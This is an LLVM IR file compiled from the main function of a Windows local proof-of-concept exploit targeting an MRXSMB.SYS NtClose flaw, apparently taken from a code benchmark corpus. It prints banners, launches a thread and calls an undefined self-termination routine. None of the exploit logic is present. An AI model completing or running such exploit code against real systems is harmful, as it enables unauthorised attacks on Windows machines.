; ModuleID = '/home/carl/AnghaBench/exploitdb/exploits/windows/local/extr_1910.c_main.c'
source_filename = "/home/carl/AnghaBench/exploitdb/exploits/windows/local/extr_1910.c_main.c"
target datalayout = "e-m:e-p270:32:32-p271:32:32-p272:64:64-i64:64-f80:128-n8:16:32:64-S128"
target triple = "x86_64-unknown-linux-gnu"

@IamAlive = common dso_local global i64 0, align 8
@.str = private unnamed_addr constant [44 x i8] c"-=[MRXSMB.SYS NtClose Vulnerability POC]=-\0A\00", align 1
@.str.1 = private unnamed_addr constant [34 x i8] c"\09(Only for educational purposes)\0A\00", align 1
@.str.2 = private unnamed_addr constant [33 x i8] c"..http://www.reversemode.com..\0A\0A\00", align 1
@.str.3 = private unnamed_addr constant [21 x i8] c"Launching Thread ...\00", align 1
@.str.4 = private unnamed_addr constant [6 x i8] c"Done\0A\00", align 1
@.str.5 = private unnamed_addr constant [56 x i8] c"I am going to dissapear,but I will be with you forever\0A\00", align 1
@.str.6 = private unnamed_addr constant [7 x i8] c"(..)\0A\0A\00", align 1

; Function Attrs: noinline nounwind optnone uwtable
define dso_local i32 @main(i32 %0, i8** %1) #0 {
  %3 = alloca i32, align 4
  %4 = alloca i32, align 4
  %5 = alloca i8**, align 8
  %6 = alloca i64, align 8
  %7 = alloca i32, align 4
  %8 = alloca i32, align 4
  store i32 0, i32* %3, align 4
  store i32 %0, i32* %4, align 4
  store i8** %1, i8*** %5, align 8
  %9 = load i64, i64* @IamAlive, align 8
  store i64 %9, i64* %6, align 8
  %10 = call i32 @printf(i8* getelementptr inbounds ([44 x i8], [44 x i8]* @.str, i64 0, i64 0))
  %11 = call i32 @printf(i8* getelementptr inbounds ([34 x i8], [34 x i8]* @.str.1, i64 0, i64 0))
  %12 = call i32 @printf(i8* getelementptr inbounds ([33 x i8], [33 x i8]* @.str.2, i64 0, i64 0))
  %13 = call i32 @printf(i8* getelementptr inbounds ([21 x i8], [21 x i8]* @.str.3, i64 0, i64 0))
  %14 = load i64, i64* %6, align 8
  %15 = call i32 @CreateThread(i32* null, i32 0, i64 %14, i32 0, i32 0, i32* %7)
  %16 = call i32 @printf(i8* getelementptr inbounds ([6 x i8], [6 x i8]* @.str.4, i64 0, i64 0))
  %17 = call i32 @printf(i8* getelementptr inbounds ([56 x i8], [56 x i8]* @.str.5, i64 0, i64 0))
  %18 = call i32 @printf(i8* getelementptr inbounds ([7 x i8], [7 x i8]* @.str.6, i64 0, i64 0))
  %19 = call i32 (...) @KillMySelf()
  ret i32 1
}

declare dso_local i32 @printf(i8*) #1

declare dso_local i32 @CreateThread(i32*, i32, i64, i32, i32, i32*) #1

declare dso_local i32 @KillMySelf(...) #1


!llvm.module.flags = !{!0}
!llvm.ident = !{!1}

!0 = !{i32 1, !"wchar_size", i32 4}
!1 = !{!"clang version 10.0.1 (https://github.com/wsmoses/llvm-project-tok c8e5003577614e72d6d18a216e6a09771e1fcce4)"}
